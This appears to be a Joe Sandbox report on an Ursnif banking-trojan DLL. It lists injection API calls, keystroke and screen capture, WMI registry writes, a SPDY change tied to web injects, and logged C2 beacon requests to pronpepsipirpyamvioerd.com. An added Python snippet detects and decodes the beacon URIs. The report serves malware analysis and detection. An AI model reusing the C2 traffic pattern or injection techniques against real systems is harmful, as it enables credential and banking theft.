            Source: Binary string: dwmapi.pdbm source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\maejgtwh\maejgtwh.pdbXPS source: powershell.exe, 0000001E.00000002.910665056.0000026F5EC2E000.00000004.00000001.sdmp
            Source: Binary string: sechost.pdbw source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: shlwapi.pdbK source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qxfma03s\qxfma03s.pdb source: powershell.exe, 0000001E.00000002.910375555.0000026F5EBB6000.00000004.00000001.sdmp
            Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000004.00000003.647057880.000000000316B000.00000004.00000001.sdmp
            Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.863977808.0000000005670000.00000004.00000001.sdmp
            Source: Binary string: combase.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000004.00000003.650889523.0000000005350000.00000004.00000040.sdmp
            Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000004.00000003.646924434.0000000003165000.00000004.00000001.sdmp
            Source: Binary string: rundll32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: sfc.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: Binary string: apphelp.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: wuser32.pdb source: WerFault.exe, 00000004.00000003.650877052.0000000005381000.00000004.00000001.sdmp
            Source: Binary string: comctl32.pdb source: WerFault.exe, 00000004.00000003.650896407.0000000005357000.00000004.00000040.sdmp
            Source: C:\Windows\explorer.exe | Code function: 37_2_04DB9064 RegisterDeviceNotificationA,37_2_04DB9064
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_004051E8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_004051E8
            Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_02F37AA8 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_02F37AA8
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 1_2_004051E8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,1_2_004051E8
            Source: C:\Windows\explorer.exe | Code function: 37_2_04DBA0C4 CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,37_2_04DBA0C4
            Source: C:\Windows\explorer.exe | Code function: 37_2_04DBEEAC FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,37_2_04DBEEAC
            Source: C:\Windows\explorer.exe | Code function: 37_2_04DB537C FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindClose,RtlDeleteBoundaryDescriptor,RtlReleasePrivilege,37_2_04DB537C

            Networking:

            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
            Source: Traffic | Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 45.67.231.135: -> 192.168.2.4:
            Source: Joe Sandbox View | ASN Name: SERVERIUS-ASNL SERVERIUS-ASNL
            Source: Joe Sandbox View | JA3 fingerprint: 57f3642b4e37e28f5cbe3020c9331b4c
            Source: C:\Windows\explorer.exe | Code function: 37_2_04DB2690 InternetReadFile,37_2_04DB2690
            Source: global traffic | HTTP traffic detected: GET /manifest/0Ru5_2BN/vJgRf6V8sbRC064gj9umjfq/qGksViZKyK/CLTbbr_2Frwl7IIUm/2WgRCjkUmuV8/iqgLjW1thwy/gJZQmwxnV_2BDM/Wr8pQO7reeN1b6Kt1HCeS/XjNtvAuY9ME_2BeN/LgpsYgJYXFXyrGm/d7KSfhzGcV8NWQ7ppv/9EulZOHC5/KtUCLTDeST800go2ZMVb/VjoLNr.snx HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: pronpepsipirpyamvioerd.com | Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: pronpepsipirpyamvioerd.com | Connection: Keep-Alive | Cookie: PHPSESSID=eshdo6go4uelgf2o7eta3f2t14; lang=en
            Source: global traffic | HTTP traffic detected: GET /manifest/NYuAqVunzg8xaQkjvT46w/1VWG9VjwQgEgBMZm/Edmv_2B8LPKApUf/y1_2FkkZHFAdOsdYZs/d_2Fil_2B/2sLNxYxtzdQxXGXvTOBx/XjwkkSX2ErFOwgwZnhQ/X4rzMPZ_2BQqzPEaol9dkp/NXUXbdRpfvyEv/malx3f_2/F5Dcl9KMBZOba09lPIsxEXU/75awVY4snO/mAGP3ya11/S.snx HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: pronpepsipirpyamvioerd.com | Connection: Keep-Alive | Cookie: lang=en
            Source: global traffic | HTTP traffic detected: GET /manifest/B6BYv9zhM9/Ha3CHkPLo3mXozKfC/o_2FE8j69Cu2/vMtBWo7v_2B/K717OxVgHzGizO/XIuLXZu8qkAN2wMJkptv8/1QwAgfct_2FjngCz/DuCEjb4kUB5NNhB/qR0_2FpSaJDi7blpKM/fBK5rghxV/R_2BqBsae2XxsQIQFD_2/FNGXxVdkHEUOrk_2FKw/pFfmknmoACymtAa0UoGCEX/7h.snx HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: pronpepsipirpyamvioerd.com | Connection: Keep-Alive | Cookie: lang=en
            Source: unknown | DNS traffic detected: queries for: assets.onestore.ms
            Source: loaddll32.exe, powershell.exe, 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
            Source: loaddll32.exe, 00000000.00000003.862194873.00000000006F0000.00000004.00000001.sdmp, powershell.exe, 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
            Source: powershell.exe, 0000001E.00000003.825326086.0000026F5A0BB000.00000004.00000001.sdmp | String found in binary or memory: http://crl.micr
            Source: WerFault.exe, 00000004.00000003.659243979.0000000005012000.00000004.00000001.sdmp | String found in binary or memory: http://crl.microsoft
            Source: loaddll32.exe, 00000000.00000003.862194873.00000000006F0000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.880565935.0000000001060000.00000040.00000001.sdmp, powershell.exe, 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: powershell.exe, 0000001E.00000002.916056905.0000026F6BB13000.00000004.00000001.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 0000001E.00000002.894782181.0000026F5BCBE000.00000004.00000001.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 0000001E.00000002.894428484.0000026F5BAB1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 0000001E.00000002.894782181.0000026F5BCBE000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 0000001E.00000002.916056905.0000026F6BB13000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000001E.00000002.916056905.0000026F6BB13000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000001E.00000002.916056905.0000026F6BB13000.00000004.00000001.sdmp | String found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 0000001E.00000002.894782181.0000026F5BCBE000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 0000001E.00000002.916056905.0000026F6BB13000.00000004.00000001.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49795
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49794
            Source: unknown | Network traffic detected: HTTP traffic on port 49794 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49795 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 49796 -> 443
            Source: unknown | HTTPS traffic detected: 104.16.249.249:443 -> 192.168.2.4:49794 version: TLS 1.2
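The three GET requests to pronpepsipirpyamvioerd.com share one shape: a fixed directory ("/manifest/"), a dozen or more mixed-case segments carrying "_2B" and "_2F", and a short final name with a fake extension (".snx"). The Python below is an added example, not part of this report, that scores request paths on those structural traits and re-joins the segments into the underlying base64 blob. The three beacon paths are copied from the traffic above; the two benign paths are constructed; and the reading of "_2B"/"_2F" as URL-encoded "+" and "/" with "%" swapped for "_", together with the "first segment is a fixed prefix, last segment carries the extension" layout, are assumptions taken from public ISFB write-ups that should be confirmed against other samples before the normaliser is trusted. The recovered bytes are ciphertext and are not decrypted here.

```python
"""Heuristic scoring of request paths shaped like the beacons in this report.
Added example, not Joe Sandbox code; recovers the URI layout only, not the plaintext."""
import base64
import re

# Constructed input: the three beacon paths are copied from the HTTP requests in this
# report; the two benign paths are invented for comparison.
BEACON_PATHS = [
    "/manifest/0Ru5_2BN/vJgRf6V8sbRC064gj9umjfq/qGksViZKyK/CLTbbr_2Frwl7IIUm/2WgRCjkUmuV8/iqgLjW1thwy/gJZQmwxnV_2BDM/Wr8pQO7reeN1b6Kt1HCeS/XjNtvAuY9ME_2BeN/LgpsYgJYXFXyrGm/d7KSfhzGcV8NWQ7ppv/9EulZOHC5/KtUCLTDeST800go2ZMVb/VjoLNr.snx",
    "/manifest/NYuAqVunzg8xaQkjvT46w/1VWG9VjwQgEgBMZm/Edmv_2B8LPKApUf/y1_2FkkZHFAdOsdYZs/d_2Fil_2B/2sLNxYxtzdQxXGXvTOBx/XjwkkSX2ErFOwgwZnhQ/X4rzMPZ_2BQqzPEaol9dkp/NXUXbdRpfvyEv/malx3f_2/F5Dcl9KMBZOba09lPIsxEXU/75awVY4snO/mAGP3ya11/S.snx",
    "/manifest/B6BYv9zhM9/Ha3CHkPLo3mXozKfC/o_2FE8j69Cu2/vMtBWo7v_2B/K717OxVgHzGizO/XIuLXZu8qkAN2wMJkptv8/1QwAgfct_2FjngCz/DuCEjb4kUB5NNhB/qR0_2FpSaJDi7blpKM/fBK5rghxV/R_2BqBsae2XxsQIQFD_2/FNGXxVdkHEUOrk_2FKw/pFfmknmoACymtAa0UoGCEX/7h.snx",
]
BENIGN_PATHS = ["/favicon.ico", "/ajax/libs/jquery/3.6.0/jquery.min.js"]

TOKEN = re.compile(r"[A-Za-z0-9_]{6,}")
FINAL = re.compile(r"[A-Za-z0-9_]+\.[a-z]{2,4}")


def looks_random(segment):
    """Mixed-case alphanumeric token of 6+ chars: no dictionary word, no dash, no dot."""
    return bool(TOKEN.fullmatch(segment)) and segment != segment.lower() and segment != segment.upper()


def score_path(path):
    """Count structural traits shared by the beacon URIs; returns (score, reasons)."""
    segs = [s for s in path.split("/") if s]
    reasons = []
    if len(path) >= 120:
        reasons.append("path length >= 120")
    if len(segs) >= 5:
        reasons.append("five or more path segments")
    if path.count("_2B") + path.count("_2F") >= 2:
        reasons.append("'_2B'/'_2F' tokens: URL-encoded '+' and '/' with '%' swapped for '_' (assumed)")
    middle = segs[:-1]
    if middle and sum(looks_random(s) for s in middle) / len(middle) >= 0.7:
        reasons.append("mostly mixed-case random-looking segments")
    if segs and FINAL.fullmatch(segs[-1]):
        reasons.append("short final name with a 2-4 letter extension")
    return len(reasons), reasons


def is_suspicious(path, threshold=3):
    return score_path(path)[0] >= threshold


def recover_blob(path):
    """Re-join the segments into the base64 blob the client split across the path.
    Assumed layout (verify per sample): first segment is a fixed prefix, last carries a
    fake extension. Join before substituting, because a '_2B'/'_2F' token can be split
    by a '/' (second beacon above: 'malx3f_2' + 'F5Dcl...')."""
    segs = [s for s in path.split("/") if s][1:]
    segs[-1] = segs[-1].rsplit(".", 1)[0]
    b64 = "".join(segs).replace("_2B", "+").replace("_2F", "/")
    b64 += "=" * (-len(b64) % 4)
    return base64.b64decode(b64)   # ciphertext; decrypting it needs the sample's key


if __name__ == "__main__":
    for p in BEACON_PATHS + BENIGN_PATHS:
        score, reasons = score_path(p)
        print(score, "SUSPICIOUS" if is_suspicious(p) else "ok", p[:60] + "...")
        for r in reasons:
            print("   -", r)
    print("recovered blob bytes:", len(recover_blob(BEACON_PATHS[0])))
```

The request headers are not a useful signal here: the beacons are sent from inside the injected iexplore.exe, so the User-Agent, Accept and Cookie values are the real browser's. The path structure, the JA3 fingerprint listed above and the ASN are what remain to pivot on, and the domain itself is throwaway.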

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.704190908.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704338669.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.881249179.0000000000146000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.862194873.00000000006F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.804269082.0000000004B5C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704231467.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704303673.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.1038694426.0000027D4F836000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704163545.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.880565935.0000000001060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.1047039764.0000000004DD6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.868598752.000001EB11270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704264515.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704123248.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.877735219.00000000030F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.704325242.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.859928425.0000026F74250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 5964, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4552, type: MEMORY
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_004225C8 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00449950 GetKeyboardState

E-Banking Fraud:

Yara detected Ursnif (same Yara memory matches as listed under Key, Mouse, Clipboard, Microphone and Screen Capturing above)
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0044C8CC NtdllDefWindowProc_A,GetCapture
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0042863C NtdllDefWindowProc_A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0044281C GetSubMenu,SaveDC,RestoreDC,72E7B080,SaveDC,RestoreDC,NtdllDefWindowProc_A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00439348 NtdllDefWindowProc_A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00439AF0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00439BA0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02C914E8 NtCreateSection,memset
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02C9183B NtMapViewOfSection
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02C922C5 NtQueryVirtualMemory
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F372D8 NtMapViewOfSection
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F31371 GetProcAddress,NtCreateSection,memset
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F37507 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_02F3B2F1 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0044C8CC NtdllDefWindowProc_A,GetCapture
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0042863C NtdllDefWindowProc_A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0044281C GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_00439348 NtdllDefWindowProc_A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_00439AF0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_00439BA0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_045422C5 NtQueryVirtualMemory
Source: C:\Windows\explorer.exe Code function: 37_2_04DA14D0 NtQueryInformationProcess
Source: C:\Windows\explorer.exe Code function: 37_2_04DC20B4 NtQueryInformationProcess
Source: C:\Windows\explorer.exe Code function: 37_2_04DC4064 NtMapViewOfSection
Source: C:\Windows\explorer.exe Code function: 37_2_04DA7008 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose
Source: C:\Windows\explorer.exe Code function: 37_2_04DA5DF4 RtlAllocateHeap,NtCreateSection
Source: C:\Windows\explorer.exe Code function: 37_2_04DC7278 NtWriteVirtualMemory
Source: C:\Windows\explorer.exe Code function: 37_2_04DA527C NtAllocateVirtualMemory
Source: C:\Windows\explorer.exe Code function: 37_2_04DB6A74 NtQuerySystemInformation
Source: C:\Windows\explorer.exe Code function: 37_2_04DB2FD0 NtQueryInformationProcess
Source: C:\Windows\explorer.exe Code function: 37_2_04DBFF54 NtReadVirtualMemory
Source: C:\Windows\explorer.exe Code function: 37_2_04DAEF1C NtSetContextThread,NtUnmapViewOfSection,NtClose
Source: C:\Windows\explorer.exe Code function: 37_2_04DB4B24 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,FindCloseChangeNotification
Source: C:\Windows\explorer.exe Code function: 37_2_04DDA002 NtProtectVirtualMemory,NtProtectVirtualMemory
Source: C:\Windows\System32\control.exe Code function: 38_2_00117008 NtQueryInformationToken,NtQueryInformationToken,NtClose
Source: C:\Windows\System32\control.exe Code function: 38_2_00134064 NtMapViewOfSection
Source: C:\Windows\System32\control.exe Code function: 38_2_001320B4 NtQueryInformationProcess
Source: C:\Windows\System32\control.exe Code function: 38_2_001114D0 NtQueryInformationProcess
Source: C:\Windows\System32\control.exe Code function: 38_2_00115DF4 NtCreateSection
Source: C:\Windows\System32\control.exe Code function: 38_2_00137278 NtWriteVirtualMemory
Source: C:\Windows\System32\control.exe Code function: 38_2_0011527C NtAllocateVirtualMemory
Source: C:\Windows\System32\control.exe Code function: 38_2_0011EF1C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose
Source: C:\Windows\System32\control.exe Code function: 38_2_00124B24 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification
Source: C:\Windows\System32\control.exe Code function: 38_2_0012FF54 NtReadVirtualMemory
Source: C:\Windows\System32\control.exe Code function: 38_2_0014A002 NtProtectVirtualMemory,NtProtectVirtualMemory
            Source: C:\Windows\System32\loaddll32.exeCode function: String function: 00403EBC appears 75 times
            Source: C:\Windows\System32\loaddll32.exeCode function: String function: 00406224 appears 61 times
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 00403EBC appears 77 times
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 00406224 appears 61 times
            Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4576 -s 756
            Source: yytr.dllStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
            Source: maejgtwh.dll.35.drStatic PE information: No import functions for PE file found
            Source: qxfma03s.dll.33.drStatic PE information: No import functions for PE file found
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
            Source: yytr.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
            Source: classification engineClassification label: mal100.bank.troj.spyw.evad.winDLL@47/76@10/3
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00420AE8 GetLastError,FormatMessageA,0_2_00420AE8
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_004085C6 GetDiskFreeSpaceA,0_2_004085C6
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_02F382EB CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,0_2_02F382EB
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00416AE4 FindResourceA,0_2_00416AE4
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{0A3DC979-6AC5-11EB-90EB-ECF4BBEA1588}.datJump to behavior
            Source: C:\Windows\System32\loaddll32.exeMutant created: \Sessions\1\BaseNamedObjects\{305FBD52-CFE8-E23F-D964-73361DD857CA}
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:120:WilError_01
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{7C7FA6C6-ABD4-0EE2-1570-0F2219A4B376}
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4576
            Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{8C972E34-7B6D-9E84-6580-DFB269B48306}
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER6B01.tmpJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
